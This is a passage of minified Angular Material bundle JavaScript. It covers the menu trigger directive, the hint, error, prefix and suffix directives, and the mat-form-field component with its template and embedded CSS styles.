i=e.keyCode;(13===i||32===i)&&(this._openedBy="keyboard"),this.triggersSubmenu()&&(39===i&&"ltr"===this.dir||37===i&&"rtl"===this.dir)&&(this._openedBy="keyboard",this.openMenu())}_handleClick(e){this.triggersSubmenu()?(e.stopPropagation(),this.openMenu()):this.toggleMenu()}_handleHover(){!this.triggersSubmenu()||!this._parentMaterialMenu||(this._hoverSubscription=this._parentMaterialMenu._hovered().pipe(Dn(e=>e===this._menuItemInstance&&!e.disabled),Z3(0,dw)).subscribe(()=>{this._openedBy="mouse",this.menu instanceof rb&&this.menu._isAnimating?this.menu._animationDone.pipe(Cn(1),Z3(0,dw),ea(this._parentMaterialMenu._hovered())).subscribe(()=>this.openMenu()):this.openMenu()}))}_getPortal(e){return(!this._portal||this._portal.templateRef!==e.templateRef)&&(this._portal=new Mm(e.templateRef,this._viewContainerRef)),this._portal}}return t.\u0275fac=function(e){return new(e||t)(Ee(vs),Ee(mi),Ee(fo),Ee(n8),Ee(a8,8),Ee(qo,10),Ee(Cr,8),Ee(js),Ee(qi))},t.\u0275dir=Ot({type:t,hostVars:3,hostBindings:function(e,i){1&e&&he("click",function(r){return i._handleClick(r)})("mousedown",function(r){return i._handleMousedown(r)})("keydown",function(r){return i._handleKeydown(r)}),2&e&&Rt("aria-haspopup",i.menu?"menu":null)("aria-expanded",i.menuOpen||null)("aria-controls",i.menuOpen?i.menu.panelId:null)},inputs:{_deprecatedMatMenuTriggerFor:["mat-menu-trigger-for","_deprecatedMatMenuTriggerFor"],menu:["matMenuTriggerFor","menu"],menuData:["matMenuTriggerData","menuData"],restoreFocus:["matMenuTriggerRestoreFocus","restoreFocus"]},outputs:{menuOpened:"menuOpened",onMenuOpen:"onMenuOpen",menuClosed:"menuClosed",onMenuClose:"onMenuClose"}}),t})(),po=(()=>{class t extends rge{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","mat-menu-trigger-for",""],["","matMenuTriggerFor",""]],hostAttrs:[1,"mat-menu-trigger"],exportAs:["matMenuTrigger"],features:[ci]}),t})(),o8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[oge],imports:[rn,la,Pd,bu,uu,la]}),t})();const sge=["connectionContainer"],cge=["inputContainer"],lge=["label"];function dge(t,a){1&t&&(bt(0),m(1,"div",14),it(2,"div",15)(3,"div",16)(4,"div",17),u(),m(5,"div",18),it(6,"div",15)(7,"div",16)(8,"div",17),u(),Mt())}function mge(t,a){if(1&t){const e=Ye();m(0,"div",19),he("cdkObserveContent",function(){return be(e),Me(B().updateOutlineGap())}),va(1,1),u()}2&t&&V("cdkObserveContentDisabled","outline"!=B().appearance)}function uge(t,a){if(1&t&&(bt(0),va(1,2),m(2,"span"),s(3),u(),Mt()),2&t){const e=B(2);C(3),ke(e._control.placeholder)}}function hge(t,a){1&t&&va(0,3,["*ngSwitchCase","true"])}function fge(t,a){1&t&&(m(0,"span",23),s(1," *"),u())}function pge(t,a){if(1&t){const e=Ye();m(0,"label",20,21),he("cdkObserveContent",function(){return be(e),Me(B().updateOutlineGap())}),ne(2,uge,4,1,"ng-container",12),ne(3,hge,1,0,"ng-content",12),ne(4,fge,2,0,"span",22),u()}if(2&t){const e=B();Ct("mat-empty",e._control.empty&&!e._shouldAlwaysFloat())("mat-form-field-empty",e._control.empty&&!e._shouldAlwaysFloat())("mat-accent","accent"==e.color)("mat-warn","warn"==e.color),V("cdkObserveContentDisabled","outline"!=e.appearance)("id",e._labelId)("ngSwitch",e._hasLabel()),Rt("for",e._control.id)("aria-owns",e._control.id),C(2),V("ngSwitchCase",!1),C(1),V("ngSwitchCase",!0),C(1),V("ngIf",!e.hideRequiredMarker&&e._control.required&&!e._control.disabled)}}function _ge(t,a){1&t&&(m(0,"div",24),va(1,4),u())}function gge(t,a){if(1&t&&(m(0,"div",25),it(1,"span",26),u()),2&t){const e=B();C(1),Ct("mat-accent","accent"==e.color)("mat-warn","warn"==e.color)}}function Cge(t,a){1&t&&(m(0,"div"),va(1,5),u()),2&t&&V("@transitionMessages",B()._subscriptAnimationState)}function yge(t,a){if(1&t&&(m(0,"div",30),s(1),u()),2&t){const e=B(2);V("id",e._hintLabelId),C(1),ke(e.hintLabel)}}function bge(t,a){if(1&t&&(m(0,"div",27),ne(1,yge,2,2,"div",28),va(2,6),it(3,"div",29),va(4,7),u()),2&t){const e=B();V("@transitionMessages",e._subscriptAnimationState),C(1),V("ngIf",e.hintLabel)}}const Mge=["*",[["","matPrefix",""]],[["mat-placeholder"]],[["mat-label"]],[["","matSuffix",""]],[["mat-error"]],[["mat-hint",3,"align","end"]],[["mat-hint","align","end"]]],vge=["*","[matPrefix]","mat-placeholder","mat-label","[matSuffix]","mat-error","mat-hint:not([align='end'])","mat-hint[align='end']"];let Age=0;const cF=new ni("MatError");let Tge=(()=>{class t{constructor(e,i){this.id="mat-error-"+Age++,e||i.nativeElement.setAttribute("aria-live","polite")}}return t.\u0275fac=function(e){return new(e||t)(Vr("aria-live"),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["mat-error"]],hostAttrs:["aria-atomic","true",1,"mat-error"],hostVars:1,hostBindings:function(e,i){2&e&&Rt("id",i.id)},inputs:{id:"id"},features:[ki([{provide:cF,useExisting:t}])]}),t})();const Ege={transitionMessages:ar("transitionMessages",[sn("enter",zi({opacity:1,transform:"translateY(0%)"})),gn("void => enter",[zi({opacity:0,transform:"translateY(-5px)"}),En("300ms cubic-bezier(0.55, 0, 0.55, 0.2)")])])};let sb=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t}),t})(),Dge=0;const lF=new ni("MatHint");let pp=(()=>{class t{constructor(){this.align="start",this.id="mat-hint-"+Dge++}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-hint"]],hostAttrs:[1,"mat-hint"],hostVars:4,hostBindings:function(e,i){2&e&&(Rt("id",i.id)("align",null),Ct("mat-form-field-hint-end","end"===i.align))},inputs:{align:"align",id:"id"},features:[ki([{provide:lF,useExisting:t}])]}),t})(),un=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-label"]]}),t})(),xge=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-placeholder"]]}),t})();const dF=new ni("MatPrefix");let mF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","matPrefix",""]],features:[ki([{provide:dF,useExisting:t}])]}),t})();const uF=new ni("MatSuffix");let jr=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","matSuffix",""]],features:[ki([{provide:uF,useExisting:t}])]}),t})(),hF=0;const Ige=kd(class{constructor(t){this._elementRef=t}},"primary"),Rge=new ni("MAT_FORM_FIELD_DEFAULT_OPTIONS"),cb=new ni("MatFormField");let nn=(()=>{class t extends Ige{constructor(e,i,n,r,c,d,T){super(e),this._changeDetectorRef=i,this._dir=n,this._defaults=r,this._platform=c,this._ngZone=d,this._outlineGapCalculationNeededImmediately=!1,this._outlineGapCalculationNeededOnStable=!1,this._destroyed=new J,this._hideRequiredMarker=!1,this._showAlwaysAnimate=!1,this._subscriptAnimationState="",this._hintLabel="",this._hintLabelId="mat-hint-"+hF++,this._labelId="mat-form-field-label-"+hF++,this.floatLabel=this._getDefaultFloatLabelState(),this._animationsEnabled="NoopAnimations"!==T,this.appearance=(null==r?void 0:r.appearance)||"legacy",r&&(this._hideRequiredMarker=Boolean(r.hideRequiredMarker),r.color&&(this.color=this.defaultColor=r.color))}get appearance(){return this._appearance}set appearance(e){var i;const n=this._appearance;this._appearance=e||(null===(i=this._defaults)||void 0===i?void 0:i.appearance)||"legacy","outline"===this._appearance&&n!==e&&(this._outlineGapCalculationNeededOnStable=!0)}get hideRequiredMarker(){return this._hideRequiredMarker}set hideRequiredMarker(e){this._hideRequiredMarker=wi(e)}_shouldAlwaysFloat(){return"always"===this.floatLabel&&!this._showAlwaysAnimate}_canLabelFloat(){return"never"!==this.floatLabel}get hintLabel(){return this._hintLabel}set hintLabel(e){this._hintLabel=e,this._processHints()}get floatLabel(){return"legacy"!==this.appearance&&"never"===this._floatLabel?"auto":this._floatLabel}set floatLabel(e){e!==this._floatLabel&&(this._floatLabel=e||this._getDefaultFloatLabelState(),this._changeDetectorRef.markForCheck())}get _control(){return this._explicitFormFieldControl||this._controlNonStatic||this._controlStatic}set _control(e){this._explicitFormFieldControl=e}getLabelId(){return this._hasFloatingLabel()?this._labelId:null}getConnectedOverlayOrigin(){return this._connectionContainerRef||this._elementRef}ngAfterContentInit(){this._validateControlChild();const e=this._control;e.controlType&&this._elementRef.nativeElement.classList.add(`mat-form-field-type-${e.controlType}`),e.stateChanges.pipe(Ro(null)).subscribe(()=>{this._validatePlaceholders(),this._syncDescribedByIds(),this._changeDetectorRef.markForCheck()}),e.ngControl&&e.ngControl.valueChanges&&e.ngControl.valueChanges.pipe(ea(this._destroyed)).subscribe(()=>this._changeDetectorRef.markForCheck()),this._ngZone.runOutsideAngular(()=>{this._ngZone.onStable.pipe(ea(this._destroyed)).subscribe(()=>{this._outlineGapCalculationNeededOnStable&&this.updateOutlineGap()})}),ra(this._prefixChildren.changes,this._suffixChildren.changes).subscribe(()=>{this._outlineGapCalculationNeededOnStable=!0,this._changeDetectorRef.markForCheck()}),this._hintChildren.changes.pipe(Ro(null)).subscribe(()=>{this._processHints(),this._changeDetectorRef.markForCheck()}),this._errorChildren.changes.pipe(Ro(null)).subscribe(()=>{this._syncDescribedByIds(),this._changeDetectorRef.markForCheck()}),this._dir&&this._dir.change.pipe(ea(this._destroyed)).subscribe(()=>{"function"==typeof requestAnimationFrame?this._ngZone.runOutsideAngular(()=>{requestAnimationFrame(()=>this.updateOutlineGap())}):this.updateOutlineGap()})}ngAfterContentChecked(){this._validateControlChild(),this._outlineGapCalculationNeededImmediately&&this.updateOutlineGap()}ngAfterViewInit(){this._subscriptAnimationState="enter",this._changeDetectorRef.detectChanges()}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete()}_shouldForward(e){const i=this._control?this._control.ngControl:null;return i&&i[e]}_hasPlaceholder(){return!!(this._control&&this._control.placeholder||this._placeholderChild)}_hasLabel(){return!(!this._labelChildNonStatic&&!this._labelChildStatic)}_shouldLabelFloat(){return this._canLabelFloat()&&(this._control&&this._control.shouldLabelFloat||this._shouldAlwaysFloat())}_hideControlPlaceholder(){return"legacy"===this.appearance&&!this._hasLabel()||this._hasLabel()&&!this._shouldLabelFloat()}_hasFloatingLabel(){return this._hasLabel()||"legacy"===this.appearance&&this._hasPlaceholder()}_getDisplayedMessages(){return this._errorChildren&&this._errorChildren.length>0&&this._control.errorState?"error":"hint"}_animateAndLockLabel(){this._hasFloatingLabel()&&this._canLabelFloat()&&(this._animationsEnabled&&this._label&&(this._showAlwaysAnimate=!0,Tc(this._label.nativeElement,"transitionend").pipe(Cn(1)).subscribe(()=>{this._showAlwaysAnimate=!1})),this.floatLabel="always",this._changeDetectorRef.markForCheck())}_validatePlaceholders(){}_processHints(){this._validateHints(),this._syncDescribedByIds()}_validateHints(){}_getDefaultFloatLabelState(){return this._defaults&&this._defaults.floatLabel||"auto"}_syncDescribedByIds(){if(this._control){let e=[];if(this._control.userAriaDescribedBy&&"string"==typeof this._control.userAriaDescribedBy&&e.push(...this._control.userAriaDescribedBy.split(" ")),"hint"===this._getDisplayedMessages()){const i=this._hintChildren?this._hintChildren.find(r=>"start"===r.align):null,n=this._hintChildren?this._hintChildren.find(r=>"end"===r.align):null;i?e.push(i.id):this._hintLabel&&e.push(this._hintLabelId),n&&e.push(n.id)}else this._errorChildren&&e.push(...this._errorChildren.map(i=>i.id));this._control.setDescribedByIds(e)}}_validateControlChild(){}updateOutlineGap(){const e=this._label?this._label.nativeElement:null,i=this._connectionContainerRef.nativeElement,n=".mat-form-field-outline-start",r=".mat-form-field-outline-gap";if("outline"!==this.appearance||!this._platform.isBrowser)return;if(!e||!e.children.length||!e.textContent.trim()){const q=i.querySelectorAll(`${n}, ${r}`);for(let Y=0;Y<q.length;Y++)q[Y].style.width="0";return}if(!this._isAttachedToDOM())return void(this._outlineGapCalculationNeededImmediately=!0);let c=0,d=0;const T=i.querySelectorAll(n),k=i.querySelectorAll(r);if(this._label&&this._label.nativeElement.children.length){const q=i.getBoundingClientRect();if(0===q.width&&0===q.height)return this._outlineGapCalculationNeededOnStable=!0,void(this._outlineGapCalculationNeededImmediately=!1);const Y=this._getStartEnd(q),te=e.children,pe=this._getStartEnd(te[0].getBoundingClientRect());let Re=0;for(let Fe=0;Fe<te.length;Fe++)Re+=te[Fe].offsetWidth;c=Math.abs(pe-Y)-5,d=Re>0?.75*Re+10:0}for(let q=0;q<T.length;q++)T[q].style.width=`${c}px`;for(let q=0;q<k.length;q++)k[q].style.width=`${d}px`;this._outlineGapCalculationNeededOnStable=this._outlineGapCalculationNeededImmediately=!1}_getStartEnd(e){return this._dir&&"rtl"===this._dir.value?e.right:e.left}_isAttachedToDOM(){const e=this._elementRef.nativeElement;if(e.getRootNode){const i=e.getRootNode();return i&&i!==e}return document.documentElement.contains(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(Cr,8),Ee(Rge,8),Ee(sr),Ee(qi),Ee(ir,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-form-field"]],contentQueries:function(e,i,n){if(1&e&&(ha(n,sb,5),ha(n,sb,7),ha(n,un,5),ha(n,un,7),ha(n,xge,5),ha(n,cF,5),ha(n,lF,5),ha(n,dF,5),ha(n,uF,5)),2&e){let r;Vt(r=Bt())&&(i._controlNonStatic=r.first),Vt(r=Bt())&&(i._controlStatic=r.first),Vt(r=Bt())&&(i._labelChildNonStatic=r.first),Vt(r=Bt())&&(i._labelChildStatic=r.first),Vt(r=Bt())&&(i._placeholderChild=r.first),Vt(r=Bt())&&(i._errorChildren=r),Vt(r=Bt())&&(i._hintChildren=r),Vt(r=Bt())&&(i._prefixChildren=r),Vt(r=Bt())&&(i._suffixChildren=r)}},viewQuery:function(e,i){if(1&e&&(Mi(sge,7),Mi(cge,5),Mi(lge,5)),2&e){let n;Vt(n=Bt())&&(i._connectionContainerRef=n.first),Vt(n=Bt())&&(i._inputContainerRef=n.first),Vt(n=Bt())&&(i._label=n.first)}},hostAttrs:[1,"mat-form-field"],hostVars:40,hostBindings:function(e,i){2&e&&Ct("mat-form-field-appearance-standard","standard"==i.appearance)("mat-form-field-appearance-fill","fill"==i.appearance)("mat-form-field-appearance-outline","outline"==i.appearance)("mat-form-field-appearance-legacy","legacy"==i.appearance)("mat-form-field-invalid",i._control.errorState)("mat-form-field-can-float",i._canLabelFloat())("mat-form-field-should-float",i._shouldLabelFloat())("mat-form-field-has-label",i._hasFloatingLabel())("mat-form-field-hide-placeholder",i._hideControlPlaceholder())("mat-form-field-disabled",i._control.disabled)("mat-form-field-autofilled",i._control.autofilled)("mat-focused",i._control.focused)("ng-untouched",i._shouldForward("untouched"))("ng-touched",i._shouldForward("touched"))("ng-pristine",i._shouldForward("pristine"))("ng-dirty",i._shouldForward("dirty"))("ng-valid",i._shouldForward("valid"))("ng-invalid",i._shouldForward("invalid"))("ng-pending",i._shouldForward("pending"))("_mat-animation-noopable",!i._animationsEnabled)},inputs:{color:"color",appearance:"appearance",hideRequiredMarker:"hideRequiredMarker",hintLabel:"hintLabel",floatLabel:"floatLabel"},exportAs:["matFormField"],features:[ki([{provide:cb,useExisting:t}]),ci],ngContentSelectors:vge,decls:15,vars:8,consts:[[1,"mat-form-field-wrapper"],[1,"mat-form-field-flex",3,"click"],["connectionContainer",""],[4,"ngIf"],["class","mat-form-field-prefix",3,"cdkObserveContentDisabled","cdkObserveContent",4,"ngIf"],[1,"mat-form-field-infix"],["inputContainer",""],[1,"mat-form-field-label-wrapper"],["class","mat-form-field-label",3,"cdkObserveContentDisabled","id","mat-empty","mat-form-field-empty","mat-accent","mat-warn","ngSwitch","cdkObserveContent",4,"ngIf"],["class","mat-form-field-suffix",4,"ngIf"],["class","mat-form-field-underline",4,"ngIf"],[1,"mat-form-field-subscript-wrapper",3,"ngSwitch"],[4,"ngSwitchCase"],["class","mat-form-field-hint-wrapper",4,"ngSwitchCase"],[1,"mat-form-field-outline"],[1,"mat-form-field-outline-start"],[1,"mat-form-field-outline-gap"],[1,"mat-form-field-outline-end"],[1,"mat-form-field-outline","mat-form-field-outline-thick"],[1,"mat-form-field-prefix",3,"cdkObserveContentDisabled","cdkObserveContent"],[1,"mat-form-field-label",3,"cdkObserveContentDisabled","id","ngSwitch","cdkObserveContent"],["label",""],["class","mat-placeholder-required mat-form-field-required-marker","aria-hidden","true",4,"ngIf"],["aria-hidden","true",1,"mat-placeholder-required","mat-form-field-required-marker"],[1,"mat-form-field-suffix"],[1,"mat-form-field-underline"],[1,"mat-form-field-ripple"],[1,"mat-form-field-hint-wrapper"],["class","mat-hint",3,"id",4,"ngIf"],[1,"mat-form-field-hint-spacer"],[1,"mat-hint",3,"id"]],template:function(e,i){1&e&&(Jn(Mge),m(0,"div",0)(1,"div",1,2),he("click",function(r){return i._control.onContainerClick&&i._control.onContainerClick(r)}),ne(3,dge,9,0,"ng-container",3),ne(4,mge,2,1,"div",4),m(5,"div",5,6),va(7),m(8,"span",7),ne(9,pge,5,16,"label",8),u()(),ne(10,_ge,2,0,"div",9),u(),ne(11,gge,2,4,"div",10),m(12,"div",11),ne(13,Cge,2,1,"div",12),ne(14,bge,5,2,"div",13),u()()),2&e&&(C(3),V("ngIf","outline"==i.appearance),C(1),V("ngIf",i._prefixChildren.length),C(5),V("ngIf",i._hasFloatingLabel()),C(1),V("ngIf",i._suffixChildren.length),C(1),V("ngIf","outline"!=i.appearance),C(1),V("ngSwitch",i._getDisplayedMessages()),C(1),V("ngSwitchCase","error"),C(1),V("ngSwitchCase","hint"))},dependencies:[Ri,Zf,p1,P3],styles:[".mat-form-field{display:inline-block;position:relative;text-align:left}[dir=rtl] .mat-form-field{text-align:right}.mat-form-field-wrapper{position:relative}.mat-form-field-flex{display:inline-flex;align-items:baseline;box-sizing:border-box;width:100%}.mat-form-field-prefix,.mat-form-field-suffix{white-space:nowrap;flex:none;position:relative}.mat-form-field-infix{display:block;position:relative;flex:auto;min-width:0;width:180px}.cdk-high-contrast-active .mat-form-field-infix{border-image:linear-gradient(transparent, transparent)}.mat-form-field-label-wrapper{position:absolute;left:0;box-sizing:content-box;width:100%;height:100%;overflow:hidden;pointer-events:none}[dir=rtl] .mat-form-field-label-wrapper{left:auto;right:0}.mat-form-field-label{position:absolute;left:0;font:inherit;pointer-events:none;width:100%;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;transform-origin:0 0;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),color 400ms cubic-bezier(0.25, 0.8, 0.25, 1),width 400ms cubic-bezier(0.25, 0.8, 0.25, 1);display:none}[dir=rtl] .mat-form-field-label{transform-origin:100% 0;left:auto;right:0}.cdk-high-contrast-active .mat-form-field-disabled .mat-form-field-label{color:GrayText}.mat-form-field-empty.mat-form-field-label,.mat-form-field-can-float.mat-form-field-should-float .mat-form-field-label{display:block}.mat-form-field-autofill-control:-webkit-autofill+.mat-form-field-label-wrapper .mat-form-field-label{display:none}.mat-form-field-can-float .mat-form-field-autofill-control:-webkit-autofill+.mat-form-field-label-wrapper .mat-form-field-label{display:block;transition:none}.mat-input-server:focus+.mat-form-field-label-wrapper .mat-form-field-label,.mat-input-server[placeholder]:not(:placeholder-shown)+.mat-form-field-label-wrapper .mat-form-field-label{display:none}.mat-form-field-can-float .mat-input-server:focus+.mat-form-field-label-wrapper .mat-form-field-label,.mat-form-field-can-float .mat-input-server[placeholder]:not(:placeholder-shown)+.mat-form-field-label-wrapper .mat-form-field-label{display:block}.mat-form-field-label:not(.mat-form-field-empty){transition:none}.mat-form-field-underline{position:absolute;width:100%;pointer-events:none;transform:scale3d(1, 1.0001, 1)}.mat-form-field-ripple{position:absolute;left:0;width:100%;transform-origin:50%;transform:scaleX(0.5);opacity:0;transition:background-color 300ms cubic-bezier(0.55, 0, 0.55, 0.2)}.mat-form-field.mat-focused .mat-form-field-ripple,.mat-form-field.mat-form-field-invalid .mat-form-field-ripple{opacity:1;transform:none;transition:transform 300ms cubic-bezier(0.25, 0.8, 0.25, 1),opacity 100ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 300ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-subscript-wrapper{position:absolute;box-sizing:border-box;width:100%;overflow:hidden}.mat-form-field-subscript-wrapper .mat-icon,.mat-form-field-label-wrapper .mat-icon{width:1em;height:1em;font-size:inherit;vertical-align:baseline}.mat-form-field-hint-wrapper{display:flex}.mat-form-field-hint-spacer{flex:1 0 1em}.mat-error{display:block}.mat-form-field-control-wrapper{position:relative}.mat-form-field-hint-end{order:1}.mat-form-field._mat-animation-noopable .mat-form-field-label,.mat-form-field._mat-animation-noopable .mat-form-field-ripple{transition:none}",'.mat-form-field-appearance-fill .mat-form-field-flex{border-radius:4px 4px 0 0;padding:.75em .75em 0 .75em}.cdk-high-contrast-active .mat-form-field-appearance-fill .mat-form-field-flex{outline:solid 1px}.cdk-high-contrast-active .mat-form-field-appearance-fill.mat-form-field-disabled .mat-form-field-flex{outline-color:GrayText}.cdk-high-contrast-active .mat-form-field-appearance-fill.mat-focused .mat-form-field-flex{outline:dashed 3px}.mat-form-field-appearance-fill .mat-form-field-underline::before{content:"";display:block;position:absolute;bottom:0;height:1px;width:100%}.mat-form-field-appearance-fill .mat-form-field-ripple{bottom:0;height:2px}.cdk-high-contrast-active .mat-form-field-appearance-fill .mat-form-field-ripple{height:0}.mat-form-field-appearance-fill:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-underline .mat-form-field-ripple{opacity:1;transform:none;transition:opacity 600ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-appearance-fill._mat-animation-noopable:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-underline .mat-form-field-ripple{transition:none}.mat-form-field-appearance-fill .mat-form-field-subscript-wrapper{padding:0 1em}','.mat-input-element{font:inherit;background:rgba(0,0,0,0);color:currentColor;border:none;outline:none;padding:0;margin:0;width:100%;max-width:100%;vertical-align:bottom;text-align:inherit;box-sizing:content-box}.mat-input-element:-moz-ui-invalid{box-shadow:none}.mat-input-element,.mat-input-element::-webkit-search-cancel-button,.mat-input-element::-webkit-search-decoration,.mat-input-element::-webkit-search-results-button,.mat-input-element::-webkit-search-results-decoration{-webkit-appearance:none}.mat-input-element::-webkit-contacts-auto-fill-button,.mat-input-element::-webkit-caps-lock-indicator,.mat-input-element:not([type=password])::-webkit-credentials-auto-fill-button{visibility:hidden}.mat-input-element[type=date],.mat-input-element[type=datetime],.mat-input-element[type=datetime-local],.mat-input-element[type=month],.mat-input-element[type=week],.mat-input-element[type=time]{line-height:1}.mat-input-element[type=date]::after,.mat-input-element[type=datetime]::after,.mat-input-element[type=datetime-local]::after,.mat-input-element[type=month]::after,.mat-input-element[type=week]::after,.mat-input-element[type=time]::after{content:" ";white-space:pre;width:1px}.mat-input-element::-webkit-inner-spin-button,.mat-input-element::-webkit-calendar-picker-indicator,.mat-input-element::-webkit-clear-button{font-size:.75em}.mat-input-element::placeholder{-webkit-user-select:none;user-select:none;transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-input-element::-moz-placeholder{-webkit-user-select:none;user-select:none;transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-input-element::-webkit-input-placeholder{-webkit-user-select:none;user-select:none;transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-input-element:-ms-input-placeholder{-webkit-user-select:none;user-select:none;transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-hide-placeholder .mat-input-element::placeholder{color:rgba(0,0,0,0) !important;-webkit-text-fill-color:rgba(0,0,0,0);transition:none}.cdk-high-contrast-active .mat-form-field-hide-placeholder .mat-input-element::placeholder{opacity:0}.mat-form-field-hide-placeholder .mat-input-element::-moz-placeholder{color:rgba(0,0,0,0) !important;-webkit-text-fill-color:rgba(0,0,0,0);transition:none}.cdk-high-contrast-active .mat-form-field-hide-placeholder .mat-input-element::-moz-placeholder{opacity:0}.mat-form-field-hide-placeholder .mat-input-element::-webkit-input-placeholder{color:rgba(0,0,0,0) !important;-webkit-text-fill-color:rgba(0,0,0,0);transition:none}.cdk-high-contrast-active .mat-form-field-hide-placeholder .mat-input-element::-webkit-input-placeholder{opacity:0}.mat-form-field-hide-placeholder .mat-input-element:-ms-input-placeholder{color:rgba(0,0,0,0) !important;-webkit-text-fill-color:rgba(0,0,0,0);transition:none}.cdk-high-contrast-active .mat-form-field-hide-placeholder .mat-input-element:-ms-input-placeholder{opacity:0}._mat-animation-noopable .mat-input-element::placeholder{transition:none}._mat-animation-noopable .mat-input-element::-moz-placeholder{transition:none}._mat-animation-noopable .mat-input-element::-webkit-input-placeholder{transition:none}._mat-animation-noopable .mat-input-element:-ms-input-placeholder{transition:none}textarea.mat-input-element{resize:vertical;overflow:auto}textarea.mat-input-element.cdk-textarea-autosize{resize:none}textarea.mat-input-element{padding:2px 0;margin:-2px 0}select.mat-input-element{-moz-appearance:none;-webkit-appearance:none;position:relative;background-color:rgba(0,0,0,0);display:inline-flex;box-sizing:border-box;padding-top:1em;top:-1em;margin-bottom:-1em}select.mat-input-element::-moz-focus-inner{border:0}select.mat-input-element:not(:disabled){cursor:pointer}.mat-form-field-type-mat-native-select .mat-form-field-infix::after{content:"";width:0;height:0;border-left:5px solid rgba(0,0,0,0);border-right:5px solid rgba(0,0,0,0);border-top:5px solid;position:absolute;top:50%;right:0;margin-top:-2.5px;pointer-events:none}[dir=rtl] .mat-form-field-type-mat-native-select .mat-form-field-infix::after{right:auto;left:0}.mat-form-field-type-mat-native-select .mat-input-element{padding-right:15px}[dir=rtl] .mat-form-field-type-mat-native-select .mat-input-element{padding-right:0;padding-left:15px}.mat-form-field-type-mat-native-select .mat-form-field-label-wrapper{max-width:calc(100% - 10px)}.mat-form-field-type-mat-native-select.mat-form-field-appearance-outline .mat-form-field-infix::after{margin-top:-5px}.mat-form-field-type-mat-native-select.mat-form-field-appearance-fill .mat-form-field-infix::after{margin-top:-10px}',".mat-form-field-appearance-legacy .mat-form-field-label{transform:perspective(100px)}.mat-form-field-appearance-legacy .mat-form-field-prefix .mat-icon,.mat-form-field-appearance-legacy .mat-form-field-suffix .mat-icon{width:1em}.mat-form-field-appearance-legacy .mat-form-field-prefix .mat-icon-button,.mat-form-field-appearance-legacy .mat-form-field-suffix .mat-icon-button{font:inherit;vertical-align:baseline}.mat-form-field-appearance-legacy .mat-form-field-prefix .mat-icon-button .mat-icon,.mat-form-field-appearance-legacy .mat-form-field-suffix .mat-icon-button .mat-icon{font-size:inherit}.mat-form-field-appearance-legacy .mat-form-field-underline{height:1px}.cdk-high-contrast-active .mat-form-field-appearance-legacy .mat-form-field-underline{height:0;border-top:solid 1px}.mat-form-field-appearance-legacy .mat-form-field-ripple{top:0;height:2px;overflow:hidden}.cdk-high-contrast-active .mat-form-field-appearance-legacy .mat-form-field-ripple{height:0;border-top:solid 2px}.mat-form-field-appearance-legacy.mat-form-field-disabled .mat-form-field-underline{background-position:0;background-color:rgba(0,0,0,0)}.cdk-high-contrast-active .mat-form-field-appearance-legacy.mat-form-field-disabled .mat-form-field-underline{border-top-style:dotted;border-top-width:2px;border-top-color:GrayText}.mat-form-field-appearance-legacy.mat-form-field-invalid:not(.mat-focused) .mat-form-field-ripple{height:1px}",".mat-form-field-appearance-outline .mat-form-field-wrapper{margin:.25em 0}.mat-form-field-appearance-outline .mat-form-field-flex{padding:0 .75em 0 .75em;margin-top:-0.25em;position:relative}.mat-form-field-appearance-outline .mat-form-field-prefix,.mat-form-field-appearance-outline .mat-form-field-suffix{top:.25em}.mat-form-field-appearance-outline .mat-form-field-outline{display:flex;position:absolute;top:.25em;left:0;right:0;bottom:0;pointer-events:none}.mat-form-field-appearance-outline .mat-form-field-outline-start,.mat-form-field-appearance-outline .mat-form-field-outline-end{border:1px solid currentColor;min-width:5px}.mat-form-field-appearance-outline .mat-form-field-outline-start{border-radius:5px 0 0 5px;border-right-style:none}[dir=rtl] .mat-form-field-appearance-outline .mat-form-field-outline-start{border-right-style:solid;border-left-style:none;border-radius:0 5px 5px 0}.mat-form-field-appearance-outline .mat-form-field-outline-end{border-radius:0 5px 5px 0;border-left-style:none;flex-grow:1}[dir=rtl] .mat-form-field-appearance-outline .mat-form-field-outline-end{border-left-style:solid;border-right-style:none;border-radius:5px 0 0 5px}.mat-form-field-appearance-outline .mat-form-field-outline-gap{border-radius:.000001px;border:1px solid currentColor;border-left-style:none;border-right-style:none}.mat-form-field-appearance-outline.mat-form-field-can-float.mat-form-field-should-float .mat-form-field-outline-gap{border-top-color:rgba(0,0,0,0)}.mat-form-field-appearance-outline .mat-form-field-outline-thick{opacity:0}.mat-form-field-appearance-outline .mat-form-field-outline-thick .mat-form-field-outline-start,.mat-form-field-appearance-outline .mat-form-field-outline-thick .mat-form-field-outline-end,.mat-form-field-appearance-outline .mat-form-field-outline-thick .mat-form-field-outline-gap{border-width:2px}.mat-form-field-appearance-outline.mat-focused .mat-form-field-outline,.mat-form-field-appearance-outline.mat-form-field-invalid 